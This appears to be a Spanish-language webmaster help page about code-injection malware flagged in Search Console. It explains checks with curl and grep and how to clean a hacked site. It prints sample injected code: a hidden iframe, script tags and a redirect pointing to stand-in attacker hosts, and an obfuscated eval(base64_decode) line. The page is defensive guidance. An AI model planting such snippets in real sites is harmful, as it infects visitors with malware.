Tipo de infección por software malicioso: inyección de código

¿Qué quiere decir que tengo URL infectadas por software malicioso del tipo "Inyección de código" en Google Search Console?

Quiere decir que las páginas de tu sitio web se han editado para incluir código malicioso, como un iframe que dirige a un sitio web atacante con software malicioso.

Consulta más información general sobre cómo evaluar los daños producidos en sitios web pirateados con software malicioso.

¿Cómo se investiga el software malicioso del tipo "inyección de código"?

En primer lugar, evita usar un navegador para ver páginas infectadas en tu sitio. El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que tu ordenador puede sufrir daños si abres una página infectada por software malicioso con un navegador.

Te recomendamos confirmar este comportamiento usando cURL o Wget para hacer solicitudes HTTP, por ejemplo, si quieres obtener una página. Estas herramientas gratuitas son útiles para diagnosticar los redireccionamientos y tienen la flexibilidad necesaria para incluir información sobre URLs de referencia o de agente de usuario. Al mostrar contenido malicioso únicamente a los usuarios con agentes de usuario o URLs de referencia específicos, el hacker puede dirigirse a más personas "reales" y evitar mejor la detección de los propietarios de sitio y de las herramientas de análisis de software malicioso. Tu sitio debe estar disponible online para usar estas herramientas.

Por ejemplo:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
Por ejemplo
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/pagina.html

A continuación, inicia sesión en tu sistema de archivos. Investiga todos los recursos que escriban en las URL infectadas por "inyección de código". Te indicamos algunos ejemplos de este tipo de ataques:

<iframe frameborder="0" height="0" src="http://<sitio-atacado>/ruta/archivo" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://sitio-atacado-software-malicioso/js/x55.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://sitio-atacado-software-malicioso/");
  }
</script>
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
#httpd.conf editado por el hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
  • iframe que dirige a un sitio web atacante
  • JavaScript u otro lenguaje de secuencia de comandos que llama a secuencias de comandos y las ejecuta desde un sitio web atacante
  • Secuencias de comandos que redirigen el navegador a un sitio web atacante
  • Código malicioso oculto para evitar que se detecte
  • Archivos de objeto compartido cuyo propósito es el de escribir código malicioso de forma aleatoria en secuencias de comandos benignas

Investiga todo código potencialmente malicioso que aparezca en el sitio. Puede ser útil buscar palabras como "[iframe]" para encontrar el código de marco flotante. Otras palabras útiles son "script", "eval" y "unescape". Por ejemplo, en sistemas basados en Unix:

$grep -irn "iframe" ./ | less

¿Cómo puedo limpiar un sitio con software malicioso del tipo "inyección de código"?

Cuando todo esté listo para limpiar tu sitio web, puedes sustituir los archivos afectados por la última copia de seguridad en buen estado o quitar la inyección de código de cada página y todas las funciones o los archivos de secuencias de comandos relacionados. Si has editado los archivos de configuración del servidor, es posible que tengas que reiniciarlo para que los cambios surtan efecto.

Ten en cuenta que quitar el código malicioso no soluciona la vulnerabilidad subyacente que permitió al hacker atacar tu sitio web. Si no corriges la causa de este ataque, es posible que tu sitio se vea otra vez en la misma situación. Para obtener más información sobre cómo limpiar todo tu sitio web, no solo en lo relacionado con este tipo de software malicioso, consulta la página Ayuda para sitios web pirateados.

¿Te ha resultado útil esta información?
¿Cómo podemos mejorar esta página?